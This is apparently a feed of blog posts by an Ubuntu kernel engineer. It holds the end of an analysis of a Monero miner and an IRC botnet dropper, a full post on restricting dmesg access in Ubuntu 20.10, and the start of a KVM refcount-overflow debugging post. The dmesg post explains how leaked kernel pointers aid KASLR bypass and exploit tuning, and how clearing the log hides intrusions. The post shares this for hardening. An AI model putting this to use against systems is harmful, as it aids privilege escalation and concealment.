<p>Most script kiddies could buy a quality exploit kit + botnet off the dark net
for a few hundred dollars, and it would be fully featured and much more
complex than hy4 is.</p>
<p>hy4 seems to be full of beginner mistakes: the binary was not stripped, and it
was packed with a stock UPX rather than a modified build that normal UPX would
refuse to unpack. None of the strings in the binary were encrypted, nor was any
effort made to hide them. There was no insertion of junk data bytes into the code
to fool disassembly algorithms.</p>
<p>There was no attempt to hide domain names or IP addresses.</p>
<p>hy4 and dovecat seem to have been compiled very recently, within the last month.
dovecat also had its metadata intact, and we could see what compiler was used.
Possibly written by someone bored at home during COVID lockdowns? Who knows.</p>
<p>To the owner of hy4: take your botnet down. If someone were sufficiently
motivated, they could probably find you. You have likely made similar beginner
mistakes with your IRC C2 server. The risk is not worth it for $200 of Monero.</p>
<p>I’m not going to come after you. I don’t care in the slightest. I only did this
analysis for fun, and to see what sort of threat this malware has to the
community.</p>
<p>But hey, your malware is also great material for beginner malware analysts to
practise on. If anyone reading this is a beginner reverse engineer, give these
samples a try. You won’t be disappointed.</p>
<h1 id="conclusion">Conclusion</h1>
<p>Today, we did a full analysis of the dovecat and hy4 malware, from samples taken
from a real production machine that had been infected, which came to light through
a case filed about some suspicious behaviour.</p>
<p>We determined that dovecat is a cryptocurrency miner that mines Monero (XMR),
and hy4 is an IRC botnet malware dropper that has the ability to spawn root
shells and to execute malware payloads.</p>
<p>I had a lot of fun analysing this malware. It’s great to get back to reverse
engineering again. I don’t get a lot of opportunities to open up Cutter and
Ghidra these days. I like pulling things apart and admiring others’ hard work,
and solving the puzzles that reverse engineering binaries brings.</p>
<p>I hope you enjoyed the writeup. If you have any questions or comments,
<a href="/about">contact</a> me.</p>
<p>Matthew Ruffell</p>Matthew RuffellA few days ago, a case came in which had some rather odd symptoms, such as processes using high amounts of CPU and memory, and running from the /tmp directory. After asking for some logs, and some samples of the binaries, it became obvious that the system was compromised, and was now running some interesting malware. In this post, we are going to look into the malware called dovecat, which turned out to be a cryptominer, and hy4, which is a IRC botnet malware dropper. I’m pretty excited, as I haven’t analysed any Linux malware before, and this is real life stuff pulled directly from a production machine, so it still has its fangs intact. Let’s get started.Getting DMESG_RESTRICT Enabled in Ubuntu 20.10 Groovy Gorilla2020-10-24T00:00:00+00:002020-10-24T00:00:00+00:00https://ruffell.nz/programming/writeups/2020/10/24/getting-dmesg-restrict-enabled-in-ubuntu-groovy<p>You might have noticed a small change when running the <code class="language-plaintext highlighter-rouge">dmesg</code> command in
Ubuntu 20.10 Groovy Gorilla, since it now errors out with:</p>
<p><code class="language-plaintext highlighter-rouge">dmesg: read kernel buffer failed: Operation not permitted</code></p>
<p>Don’t worry, it still works, it has just become a privileged operation, and it
works fine with <code class="language-plaintext highlighter-rouge">sudo dmesg</code>. But why the change?</p>
<p>Well, I happen to be the one who proposed for this change to be made, and
followed up on getting the configuration changes made. This blog post will
describe how it slightly improves the security of Ubuntu, and the journey to
getting the changes landed in a release.</p>
<p><img src="/assets/images/2020_020.png" alt="hero" /></p>
<p>So stay tuned, and let’s dive into <code class="language-plaintext highlighter-rouge">dmesg</code>.</p>
<!--more-->
<h1 id="what-is-dmesg">What is dmesg?</h1>
<p><code class="language-plaintext highlighter-rouge">dmesg</code> is a command that allows you to view the kernel log buffer. The kernel
log buffer contains a whole wealth of information about system hardware, devices
attached and their allocated memory regions, and error logging for the system.</p>
<p>This log buffer usually lives at <code class="language-plaintext highlighter-rouge">/dev/kmsg</code> or <code class="language-plaintext highlighter-rouge">/proc/kmsg</code>, which is what
tools like <code class="language-plaintext highlighter-rouge">dmesg</code> or <code class="language-plaintext highlighter-rouge">journalctl</code> or various <code class="language-plaintext highlighter-rouge">syslog</code> programs read from.</p>
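<p>As a quick illustration of how little is needed to read it, the sketch below streams records straight out of <code class="language-plaintext highlighter-rouge">/dev/kmsg</code>; each <code class="language-plaintext highlighter-rouge">read()</code> returns one log record, and with <code class="language-plaintext highlighter-rouge">O_NONBLOCK</code> the read returns <code class="language-plaintext highlighter-rouge">EAGAIN</code> once the buffer is exhausted. Once <code class="language-plaintext highlighter-rouge">DMESG_RESTRICT</code> is in effect, an unprivileged user is refused access here instead.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <unistd.h>

/* Minimal dmesg-alike: stream records straight out of /dev/kmsg. */
int main(void)
{
    char rec[8192];
    int fd = open("/dev/kmsg", O_RDONLY | O_NONBLOCK);
    if (fd < 0) {
        perror("open /dev/kmsg");    /* EPERM once DMESG_RESTRICT applies */
        return 1;
    }

    for (;;) {
        ssize_t n = read(fd, rec, sizeof(rec) - 1);
        if (n < 0) {
            if (errno == EAGAIN)     /* no more records in the buffer */
                break;
            continue;                /* EPIPE means we missed records; retry */
        }
        rec[n] = '\0';
        fputs(rec, stdout);
    }

    close(fd);
    return 0;
}
</code></pre></div></div>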
<p>If we look at some typical start-up information, it really isn’t too interesting.</p>
<p><img src="/assets/images/2020_021.png" alt="early dmesg" /></p>
<h1 id="why-is-restricting-dmesg-important">Why is restricting dmesg important?</h1>
<p>The thing is, the kernel log buffer can sometimes contain all sorts of security
critical information, such as pointers to kernel memory. There has been a large
effort in the mainline kernel for a few years now to remove all instances of
<code class="language-plaintext highlighter-rouge">printk("%p")</code>, which leaked raw kernel pointers to the kernel log buffer.</p>
<p>These days, all <code class="language-plaintext highlighter-rouge">%p</code> format strings hash the kernel pointer, so the address
itself is not leaked, but the hash still gives a unique identifier for developers to
look at in <code class="language-plaintext highlighter-rouge">printk</code> output.</p>
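<p>For anyone curious what this looks like from the kernel side, the difference is purely in the format specifier. The fragment below is illustrative kernel-style code, not taken from any particular driver:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>#include <linux/printk.h>

/* Illustration only: how pointer printing behaves in modern kernels. */
static void show_pointer(void *ptr)
{
    pr_info("hashed:     %p\n",  ptr);   /* %p prints a hashed value, not the real address */
    pr_info("raw:        %px\n", ptr);   /* %px prints the raw address; use is discouraged */
    pr_info("restricted: %pK\n", ptr);   /* %pK honours the kptr_restrict sysctl */
}
</code></pre></div></div>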
<p>However, kernel pointers can still be leaked in other ways, such as if the system
suffers an oops, it will print the current kernel stacktrace, as well as provide
a copy of register values:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> [3191370.893495] WARNING: CPU: 13 PID: 48929 at /build/linux-hwe-FEhT7y/linux-hwe-4.15.0/include/linux/mm.h:852 follow_page_pte+0x6f4/0x710
[3191370.893552] CPU: 13 PID: 48929 Comm: CPU 0/KVM Not tainted 4.15.0-106-generic #107~16.04.1-Ubuntu
[3191370.893552] Hardware name: Dell Inc. PowerEdge R740xd/00WGD1, BIOS 2.6.4 04/09/2020
[3191370.893554] RIP: 0010:follow_page_pte+0x6f4/0x710
[3191370.893555] RSP: 0018:ffffad279f7ab908 EFLAGS: 00010286
[3191370.893556] RAX: ffffdc0fa72eba80 RBX: ffffdc0f9b1535b0 RCX: 0000000080000000
[3191370.893556] RDX: 0000000000000000 RSI: 00003ffffffff000 RDI: 800000b9cbaea225
[3191370.893557] RBP: ffffad279f7ab970 R08: 800000b9cbaea225 R09: ffff9359857fd5f0
[3191370.893558] R10: 0000000000000000 R11: 0000000000000000 R12: ffffdc0fa72eba80
[3191370.893558] R13: 0000000000000326 R14: ffff935de09e19e0 R15: ffff9359857fd5f0
[3191370.893559] FS: 00007f68757fa700(0000) GS:ffff93617ef80000(0000) knlGS:ffff964a7fc00000
[3191370.893559] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[3191370.893560] CR2: 00007ff92ca7a000 CR3: 000000b7209d2005 CR4: 00000000007626e0
[3191370.893561] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000
[3191370.893561] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400
[3191370.893561] PKRU: 55555554
[3191370.893562] Call Trace:
[3191370.893565] follow_pmd_mask+0x273/0x630
[3191370.893567] ? gup_pgd_range+0x23f/0xde0
[3191370.893568] follow_page_mask+0x178/0x230
[3191370.893569] __get_user_pages+0xb8/0x740
[3191370.893571] get_user_pages+0x42/0x50
[3191370.893604] __gfn_to_pfn_memslot+0x18b/0x3b0 [kvm]
[3191370.893615] ? mmu_set_spte+0x1dd/0x3a0 [kvm]
[3191370.893626] try_async_pf+0x66/0x220 [kvm]
[3191370.893635] tdp_page_fault+0x14b/0x2b0 [kvm]
[3191370.893640] ? vmexit_fill_RSB+0x10/0x40 [kvm_intel]
[3191370.893649] kvm_mmu_page_fault+0x62/0x180 [kvm]
[3191370.893651] handle_ept_violation+0xbc/0x160 [kvm_intel]
[3191370.893654] vmx_handle_exit+0xa5/0x580 [kvm_intel]
[3191370.893664] vcpu_enter_guest+0x414/0x1260 [kvm]
[3191370.893674] kvm_arch_vcpu_ioctl_run+0xd9/0x3d0 [kvm]
[3191370.893683] ? kvm_arch_vcpu_ioctl_run+0xd9/0x3d0 [kvm]
[3191370.893691] kvm_vcpu_ioctl+0x33a/0x610 [kvm]
[3191370.893693] ? audit_filter_rules+0x232/0x1070
[3191370.893696] do_vfs_ioctl+0xa4/0x600
[3191370.893697] ? __audit_syscall_entry+0xac/0x100
[3191370.893699] ? syscall_trace_enter+0x1d6/0x2f0
[3191370.893700] SyS_ioctl+0x79/0x90
[3191370.893701] do_syscall_64+0x73/0x130
[3191370.893704] entry_SYSCALL_64_after_hwframe+0x3d/0xa2
</code></pre></div></div>
<p>If kernel pointers happen to be in the registers at the time of oops, they get
leaked to the kernel log buffer.</p>
<p>Kernel pointers are valuable to attackers and exploit developers, because they
act as <em>information leaks</em>. These information leaks make it much easier to
de-randomise the kernel base address and to defeat KASLR. If an attacker is
trying to launch a privilege escalation attack against a recently compromised
host, they can also use dmesg to get instant feedback on their exploits, as
failures will cause further oops messages or segmentation faults. This makes it
easier for attackers to fix and tune their exploit programs until they work.</p>
<p>Currently, if I create a new, unprivileged user on a Focal system, they cannot
access <code class="language-plaintext highlighter-rouge">/var/log/kern.log</code>, <code class="language-plaintext highlighter-rouge">/var/log/syslog</code> or see system events in <code class="language-plaintext highlighter-rouge">journalctl</code>.
And yet, they are given free rein over the kernel log buffer.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sudo adduser dave
$ su dave
$ groups
dave
$ cat /var/log/kern.log
cat: /var/log/kern.log: Permission denied
$ cat /var/log/syslog
cat: /var/log/syslog: Permission denied
$ journalctl
Hint: You are currently not seeing messages from other users and the system.
Users in groups 'adm', 'systemd-journal' can see all messages.
Pass -q to turn off this notice.
Jun 16 23:44:59 ubuntu systemd[2328]: Reached target Main User Target.
Jun 16 23:44:59 ubuntu systemd[2328]: Startup finished in 69ms.
$ dmesg
[ 0.000000] Linux version 5.4.0-34-generic (buildd at lcy01-amd64-014)
(gcc version 9.3.0 (Ubuntu 9.3.0-10ubuntu2)) #38-Ubuntu SMP Mon May 25 15:46:55
UTC 2020 (Ubuntu 5.4.0-34.38-generic 5.4.41)
[ 0.000000] Command line: BOOT_IMAGE=/boot/vmlinuz-5.4.0-34-generic
root=UUID=f9f909c3-782a-43c2-a59d-c789656b4188 ro
</code></pre></div></div>
<p>Strange how an unprivileged user can read dmesg just fine, and yet cannot access
any other kernel logs on the system.</p>
<h1 id="the-initial-proposal">The Initial Proposal</h1>
<p>I sent a proposal to <code class="language-plaintext highlighter-rouge">ubuntu-devel</code> in June which outlines the above problems,
to gather some feedback and to see if anyone else thinks that this is a good
idea.</p>
<p><a href="https://lists.ubuntu.com/archives/ubuntu-devel/2020-June/041063.html">Proposal: Enabling DMESG_RESTRICT for Groovy Onward</a></p>
<p><img src="/assets/images/2020_022.png" alt="proposal" /></p>
<p>I suggested that we restrict access to dmesg to users in group ‘adm’ like so:</p>
<ol>
<li><code class="language-plaintext highlighter-rouge">CONFIG_SECURITY_DMESG_RESTRICT=y</code> in the kernel.</li>
<li>Following changes to <code class="language-plaintext highlighter-rouge">/bin/dmesg</code> permissions in package <code class="language-plaintext highlighter-rouge">util-linux</code>
<ul>
<li>Ownership changes to <code class="language-plaintext highlighter-rouge">root:adm</code></li>
<li>Permissions changed to <code class="language-plaintext highlighter-rouge">0750 (-rwxr-x---)</code></li>
<li>Add <code class="language-plaintext highlighter-rouge">cap_syslog</code> capability to binary.</li>
</ul>
</li>
<li>Add a commented out <code class="language-plaintext highlighter-rouge"># kernel.dmesg_restrict = 0</code> to
<code class="language-plaintext highlighter-rouge">/etc/sysctl.d/10-kernel-hardening.conf</code></li>
</ol>
<p>Let’s break these down.</p>
<p>Number 1 is how <code class="language-plaintext highlighter-rouge">DMESG_RESTRICT</code> gets enforced, as setting <code class="language-plaintext highlighter-rouge">CONFIG_SECURITY_DMESG_RESTRICT=y</code>
in the kernel config restricts the kernel log buffer to executables with
<code class="language-plaintext highlighter-rouge">CAP_SYSLOG</code>, or root privileges.</p>
<p>Number 2 allows users in the <code class="language-plaintext highlighter-rouge">adm</code> group, also known as “administration”, to
be able to execute dmesg without becoming super user, which means nothing
would change for default users in most systems.</p>
<p>Number 3 adds an easy way for system administrators to disable the change if they
want.</p>
<p>I filed a Launchpad bug to document the changes and track the patches I had
created for <code class="language-plaintext highlighter-rouge">util-linux</code> and <code class="language-plaintext highlighter-rouge">procps</code>.</p>
<p><a href="https://bugs.launchpad.net/bugs/1886112">LP #1886112 Enabling DMESG_RESTRICT in Groovy Onward</a></p>
<h2 id="early-responses-and-getting-the-kernel-config-changed-1">Early Responses and Getting the Kernel Config Changed (1)</h2>
<p>The security team were +1 with the change:</p>
<p><a href="https://lists.ubuntu.com/archives/ubuntu-devel/2020-June/041067.html">https://lists.ubuntu.com/archives/ubuntu-devel/2020-June/041067.html</a></p>
<p>When I woke up the next day, the strangest thing happened. <a href="https://www.phoronix.com">Phoronix</a>
had written an article about my proposal!</p>
<p><a href="https://www.phoronix.com/scan.php?page=news_item&px=Ubuntu-20.10-Restrict-dmesg">Ubuntu 20.10 Looking At Restricting Access To Kernel Logs With dmesg</a></p>
<p>This wasn’t expected at all, and it got people talking about the change in
forums, instead of it just being silently made and me hoping that no one noticed.</p>
<p>After that, Seth Forshee, from the kernel team, double checked with the security
team, and then went ahead and applied the change to the “unstable” kernel tree,
since Groovy’s kernel had not yet forked off from it at that point in time.</p>
<p><a href="https://lists.ubuntu.com/archives/ubuntu-devel/2020-July/041079.html">https://lists.ubuntu.com/archives/ubuntu-devel/2020-July/041079.html</a></p>
<p>The kernel commit is:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Commit 25e6c851704a47c81e78e1a82530ac4b328098a6
From: Seth Forshee <seth.forshee@canonical.com>
Date: Thu, 2 Jul 2020 13:29:55 -0500
Subject: UBUNTU: [Config] CONFIG_SECURITY_DMESG_RESTRICT=y
Link: https://kernel.ubuntu.com/git/ubuntu/unstable.git/commit/?id=25e6c851704a47c81e78e1a82530ac4b328098a6
</code></pre></div></div>
<p>Now that the configuration change was made in the kernel, Number 1 in the
list was completed.</p>
<h2 id="upstream-discussions-for-adding-cap_syslog-to-bindmesg-2">Upstream Discussions for Adding CAP_SYSLOG to /bin/dmesg (2)</h2>
<p>At this point, things got a bit stuck. I got busy and no one else replied to my
previous posts, so the changes to <code class="language-plaintext highlighter-rouge">util-linux</code> got a little delayed.</p>
<p>I restarted these talks with the below message to <code class="language-plaintext highlighter-rouge">ubuntu-devel</code>, and included
the upstream Debian maintainers to the CC list.</p>
<p><a href="https://lists.ubuntu.com/archives/ubuntu-devel/2020-August/041117.html">https://lists.ubuntu.com/archives/ubuntu-devel/2020-August/041117.html</a></p>
<p>This was successful, and Chris Hofstaedtler wrote back. Chris asked if this had
been discussed before in Debian:</p>
<p><a href="https://lists.ubuntu.com/archives/ubuntu-devel/2020-August/041118.html">https://lists.ubuntu.com/archives/ubuntu-devel/2020-August/041118.html</a></p>
<p>I responded with what I could find, but I also mentioned that I would write
to <code class="language-plaintext highlighter-rouge">debian-devel</code>.</p>
<p><a href="https://lists.ubuntu.com/archives/ubuntu-devel/2020-August/041125.html">https://lists.ubuntu.com/archives/ubuntu-devel/2020-August/041125.html</a></p>
<p>So, I went and proposed similar changes to <code class="language-plaintext highlighter-rouge">debian-devel</code> in this thread:</p>
<p><a href="https://lists.debian.org/debian-devel/2020/08/msg00107.html">https://lists.debian.org/debian-devel/2020/08/msg00107.html</a></p>
<p>I got some positive responses, but the most interesting one was from Ansgar:</p>
<p><a href="https://lists.debian.org/debian-devel/2020/08/msg00121.html">https://lists.debian.org/debian-devel/2020/08/msg00121.html</a></p>
<p>Ansgar mentioned that if <code class="language-plaintext highlighter-rouge">/bin/dmesg</code> is granted <code class="language-plaintext highlighter-rouge">CAP_SYSLOG</code>, and <code class="language-plaintext highlighter-rouge">/bin/dmesg</code>
was opened up to users of group <code class="language-plaintext highlighter-rouge">adm</code>, then any user of <code class="language-plaintext highlighter-rouge">adm</code> could clear the
kernel log buffer by running <code class="language-plaintext highlighter-rouge">$ dmesg --clear</code>.</p>
<p>Now, I had missed this, and it was an excellent catch.</p>
<p>We don’t want to make it easier for anyone to clear the kernel log buffer, since
that can be used to hide an attacker’s presence, so adding <code class="language-plaintext highlighter-rouge">CAP_SYSLOG</code> to <code class="language-plaintext highlighter-rouge">/bin/dmesg</code>
is a bad idea.</p>
<p>Chris mentions this in his message back:</p>
<p><a href="https://lists.ubuntu.com/archives/ubuntu-devel/2020-August/041151.html">https://lists.ubuntu.com/archives/ubuntu-devel/2020-August/041151.html</a></p>
<p>From there, Steve Langasek also mentioned that it was a bad idea:</p>
<p><a href="https://lists.ubuntu.com/archives/ubuntu-devel/2020-August/041152.html">https://lists.ubuntu.com/archives/ubuntu-devel/2020-August/041152.html</a></p>
<p>and with that, I decided to drop the idea of adding <code class="language-plaintext highlighter-rouge">CAP_SYSLOG</code> to <code class="language-plaintext highlighter-rouge">/bin/dmesg</code>
and changing the group to <code class="language-plaintext highlighter-rouge">adm</code>:</p>
<p><a href="https://lists.ubuntu.com/archives/ubuntu-devel/2020-August/041153.html">https://lists.ubuntu.com/archives/ubuntu-devel/2020-August/041153.html</a></p>
<p>That strikes Number 2 off the list. It’s a bit of a pity, since it means
that users in group <code class="language-plaintext highlighter-rouge">adm</code> have to write <code class="language-plaintext highlighter-rouge">$ sudo dmesg</code> instead of <code class="language-plaintext highlighter-rouge">$ dmesg</code>.
Hopefully it won’t be too much of a bother to become superuser to view dmesg.
Time will tell, I suppose, and most distros follow this behaviour anyway.</p>
<h2 id="landing-sysctl-configuration-changes-3">Landing sysctl Configuration Changes (3)</h2>
<p>Shortly after the upstream <code class="language-plaintext highlighter-rouge">util-linux</code> discussion ended, Brian Murray sponsored
my patches to <code class="language-plaintext highlighter-rouge">procps</code> to add some documentation about <code class="language-plaintext highlighter-rouge">CONFIG_SECURITY_DMESG_RESTRICT</code>
and instructions on how to disable it by changing a sysctl variable.</p>
<p><img src="/assets/images/2020_023.png" alt="sysctl" /></p>
<p>As my description states, if you want to turn off <code class="language-plaintext highlighter-rouge">DMESG_RESTRICT</code>, you can
do so by uncommenting the sysctl string <code class="language-plaintext highlighter-rouge">kernel.dmesg_restrict = 0</code>, and
rebooting.</p>
<p>With this, Number 3 in the list was completed.</p>
<h1 id="conclusion">Conclusion</h1>
<p>That is the story of how <code class="language-plaintext highlighter-rouge">DMESG_RESTRICT</code> was enabled in Ubuntu 20.10 Groovy
Gorilla. We covered how it slightly improves system security by removing an avenue
attackers could use to view leaked kernel pointers, the process of getting all
the separate changes landed, and relevant upstream discussions.</p>
<p>I hope you enjoyed the read, and if you have any questions or comments, feel
free to <a href="/about">contact me</a>.</p>
<p>Matthew Ruffell</p>Matthew RuffellYou might have noticed a small change when running the dmesg command in Ubuntu 20.10 Groovy Gorilla, since it now errors out with: dmesg: read kernel buffer failed: Operation not permitted Don’t worry, it still works, it has just become a privileged operation, and it works fine with sudo dmesg. But why the change? Well, I happen to be the one who proposed for this change to be made, and followed up on getting the configuration changes made. This blog post will describe how it slightly improves the security of Ubuntu, and the journey to getting the changes landed in a release. So stay tuned, and let’s dive into dmesg.Debugging a Zero Page Reference Counter Overflow on the Ubuntu 4.15 Kernel2020-09-02T00:00:00+00:002020-09-02T00:00:00+00:00https://ruffell.nz/programming/writeups/2020/09/02/debugging-a-zero-page-reference-counter-overflow-on-4-15-kernel<p>Recently I worked a particularly interesting case where an OpenStack compute node
had all of its virtual machines pause at the same time, which I attributed to
a reference counter overflowing in the kernel’s <code class="language-plaintext highlighter-rouge">zero_page</code>.</p>
<p>Today, we are going to take an in-depth look at the problem at hand, and see how
I debugged and fixed the issue, from beginning to end.</p>
<p><img src="/assets/images/2020_019.png" alt="hero" /></p>
<p>Let’s get started.</p>
<!--more-->
<h1 id="problem-description">Problem Description</h1>
<p>The first thing to do with any problem is to understand what happened, and gather
as much data as possible.</p>
<p>Having a look at the case, the complaint is that an OpenStack compute node
running on 16.04 LTS with the Xenial-Queens cloud archive enabled suffered a
failure where all virtual machines were paused at once. The node was running
the 4.15 Xenial HWE kernel, so this system is more or less built with Bionic
components on top of Xenial.</p>
<p>The logs show various QEMU errors and a crash, as well as a kernel oops. Let’s
have a look.</p>
<p>From syslog:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>error : qemuMonitorJSONCheckError:392 : internal error: unable to execute QEMU command 'cont': Resetting the Virtual Machine is required
</code></pre></div></div>
<p>From QEMU Logs:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>error: kvm run failed Bad address
EAX=000afe00 EBX=0000000b ECX=00000080 EDX=00000cfe
ESI=0003fe00 EDI=000afe00 EBP=00000007 ESP=00006d74
EIP=000ee344 EFL=00010002 [-------] CPL=0 II=0 A20=1 SMM=0 HLT=0
ES =0010 00000000 ffffffff 00c09300 DPL=0 DS [-WA]
CS =0008 00000000 ffffffff 00c09b00 DPL=0 CS32 [-RA]
SS =0010 00000000 ffffffff 00c09300 DPL=0 DS [-WA]
DS =0010 00000000 ffffffff 00c09300 DPL=0 DS [-WA]
FS =0010 00000000 ffffffff 00c09300 DPL=0 DS [-WA]
GS =0010 00000000 ffffffff 00c09300 DPL=0 DS [-WA]
LDT=0000 00000000 0000ffff 00008200 DPL=0 LDT
TR =0000 00000000 0000ffff 00008b00 DPL=0 TSS32-busy
GDT= 000f7040 00000037
IDT= 000f707e 00000000
CR0=00000011 CR2=00000000 CR3=00000000 CR4=00000000
DR0=0000000000000000 DR1=0000000000000000 DR2=0000000000000000 DR3=0000000000000000
DR6=00000000ffff0ff0 DR7=0000000000000400
EFER=0000000000000000
Code=c3 57 56 b8 00 fe 0a 00 be 00 fe 03 00 b9 80 00 00 00 89 c7 <f3> a5 a1 00 80 03 00 8b 15 04 80 03 00 a3 00 80 0a 00 89 15 04 80 0a 00 b8 ae e2 00 00 31
</code></pre></div></div>
<p>Finally, the kernel oops:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> [3191370.893495] WARNING: CPU: 13 PID: 48929 at /build/linux-hwe-FEhT7y/linux-hwe-4.15.0/include/linux/mm.h:852 follow_page_pte+0x6f4/0x710
[3191370.893552] CPU: 13 PID: 48929 Comm: CPU 0/KVM Not tainted 4.15.0-106-generic #107~16.04.1-Ubuntu
[3191370.893552] Hardware name: Dell Inc. PowerEdge R740xd/00WGD1, BIOS 2.6.4 04/09/2020
[3191370.893554] RIP: 0010:follow_page_pte+0x6f4/0x710
[3191370.893555] RSP: 0018:ffffad279f7ab908 EFLAGS: 00010286
[3191370.893556] RAX: ffffdc0fa72eba80 RBX: ffffdc0f9b1535b0 RCX: 0000000080000000
[3191370.893556] RDX: 0000000000000000 RSI: 00003ffffffff000 RDI: 800000b9cbaea225
[3191370.893557] RBP: ffffad279f7ab970 R08: 800000b9cbaea225 R09: ffff9359857fd5f0
[3191370.893558] R10: 0000000000000000 R11: 0000000000000000 R12: ffffdc0fa72eba80
[3191370.893558] R13: 0000000000000326 R14: ffff935de09e19e0 R15: ffff9359857fd5f0
[3191370.893559] FS: 00007f68757fa700(0000) GS:ffff93617ef80000(0000) knlGS:ffff964a7fc00000
[3191370.893559] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[3191370.893560] CR2: 00007ff92ca7a000 CR3: 000000b7209d2005 CR4: 00000000007626e0
[3191370.893561] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000
[3191370.893561] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400
[3191370.893561] PKRU: 55555554
[3191370.893562] Call Trace:
[3191370.893565] follow_pmd_mask+0x273/0x630
[3191370.893567] ? gup_pgd_range+0x23f/0xde0
[3191370.893568] follow_page_mask+0x178/0x230
[3191370.893569] __get_user_pages+0xb8/0x740
[3191370.893571] get_user_pages+0x42/0x50
[3191370.893604] __gfn_to_pfn_memslot+0x18b/0x3b0 [kvm]
[3191370.893615] ? mmu_set_spte+0x1dd/0x3a0 [kvm]
[3191370.893626] try_async_pf+0x66/0x220 [kvm]
[3191370.893635] tdp_page_fault+0x14b/0x2b0 [kvm]
[3191370.893640] ? vmexit_fill_RSB+0x10/0x40 [kvm_intel]
[3191370.893649] kvm_mmu_page_fault+0x62/0x180 [kvm]
[3191370.893651] handle_ept_violation+0xbc/0x160 [kvm_intel]
[3191370.893654] vmx_handle_exit+0xa5/0x580 [kvm_intel]
[3191370.893664] vcpu_enter_guest+0x414/0x1260 [kvm]
[3191370.893674] kvm_arch_vcpu_ioctl_run+0xd9/0x3d0 [kvm]
[3191370.893683] ? kvm_arch_vcpu_ioctl_run+0xd9/0x3d0 [kvm]
[3191370.893691] kvm_vcpu_ioctl+0x33a/0x610 [kvm]
[3191370.893693] ? audit_filter_rules+0x232/0x1070
[3191370.893696] do_vfs_ioctl+0xa4/0x600
[3191370.893697] ? __audit_syscall_entry+0xac/0x100
[3191370.893699] ? syscall_trace_enter+0x1d6/0x2f0
[3191370.893700] SyS_ioctl+0x79/0x90
[3191370.893701] do_syscall_64+0x73/0x130
[3191370.893704] entry_SYSCALL_64_after_hwframe+0x3d/0xa2
[3191370.893705] RIP: 0033:0x7f68c81b4f47
[3191370.893706] RSP: 002b:00007f68757f98b8 EFLAGS: 00000246 ORIG_RAX: 0000000000000010
[3191370.893707] RAX: ffffffffffffffda RBX: 000000000000ae80 RCX: 00007f68c81b4f47
[3191370.893707] RDX: 0000000000000000 RSI: 000000000000ae80 RDI: 0000000000000031
[3191370.893708] RBP: 000055ac785ae320 R08: 000055ac77357310 R09: 00000000000000ff
[3191370.893708] R10: 0000000000000001 R11: 0000000000000246 R12: 0000000000000000
[3191370.893708] R13: 00007f68cd582000 R14: 0000000000000000 R15: 000055ac785ae320
[3191370.893709] Code: 4d 63 e6 e9 f2 fc ff ff 4c 89 45 d0 48 8b 47 10 e8 22 f0 9e 00 4c 8b 45 d0 e9 89 fc ff ff 4c 89 e7 e8 81 3f fd ff e9 aa fc ff ff <0f> 0b 49 c7 c4 f4 ff ff ff e9 c1 fc ff ff 0f 1f 40 00 66 2e 0f
</code></pre></div></div>
<p>Since the kernel oops mentions a few functions in the KVM module, and we know
that all VMs were paused at the same time, we are probably looking at a kernel
problem and not a problem in QEMU or OpenStack.</p>
<p>Looking at the system time, 3191370 seconds is 36.93 days, which is quite a long
time, so this fault is likely something that takes time to hit. Time to start
digging.</p>
<h1 id="analysis-of-kernel-oops">Analysis of Kernel Oops</h1>
<p>Looking at the call trace in the kernel oops, we see that an EPT (Extended Page
Table) violation has happened, with the call to <code class="language-plaintext highlighter-rouge">handle_ept_violation()</code>
in the <code class="language-plaintext highlighter-rouge">kvm_intel</code> module.</p>
<p>Right after that, we page fault with <code class="language-plaintext highlighter-rouge">kvm_mmu_page_fault()</code>, which calls
<code class="language-plaintext highlighter-rouge">tdp_page_fault()</code>.</p>
<p>From there, the kernel goes on a goose chase to try to locate a particular page,
with calls to <code class="language-plaintext highlighter-rouge">get_user_pages()</code>, <code class="language-plaintext highlighter-rouge">follow_page_mask()</code>, <code class="language-plaintext highlighter-rouge">gup_pgd_range()</code> and
<code class="language-plaintext highlighter-rouge">follow_pmd_mask()</code>.</p>
<p>We crash at <code class="language-plaintext highlighter-rouge">follow_page_pte+0x6f4</code>, which is mentioned in <code class="language-plaintext highlighter-rouge">RIP</code>.</p>
<p>Okay, so the next step is to read the code at <code class="language-plaintext highlighter-rouge">follow_page_pte+0x6f4</code>, so we
download the <a href="http://ddebs.ubuntu.com/ubuntu/pool/main/l/linux-hwe/linux-image-unsigned-4.15.0-106-generic-dbgsym_4.15.0-106.107~16.04.1_amd64.ddeb">debug kernel ddeb</a>, for Xenial HWE, and save it to disk.</p>
<p>From there we can extract it, and query the file and line of code with <code class="language-plaintext highlighter-rouge">eu-addr2line</code>:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ dpkg -x linux-image-unsigned-4.15.0-106-generic-dbgsym_4.15.0-106.107~16.04.1_amd64.ddeb linux
$ cd linux/usr/lib/debug/boot
$ eu-addr2line -e ./vmlinux-4.15.0-106-generic -f follow_page_pte+0x6f4
try_get_page inlined at /build/linux-hwe-FEhT7y/linux-hwe-4.15.0/mm/gup.c:156 in follow_page_pte
/build/linux-hwe-FEhT7y/linux-hwe-4.15.0/mm/gup.c:170
</code></pre></div></div>
<p>Okay, this is interesting. Let’s jump to mm/gup.c:156 in the 4.15 kernel source
tree, and see that we are in <code class="language-plaintext highlighter-rouge">follow_page_pte()</code>:</p>
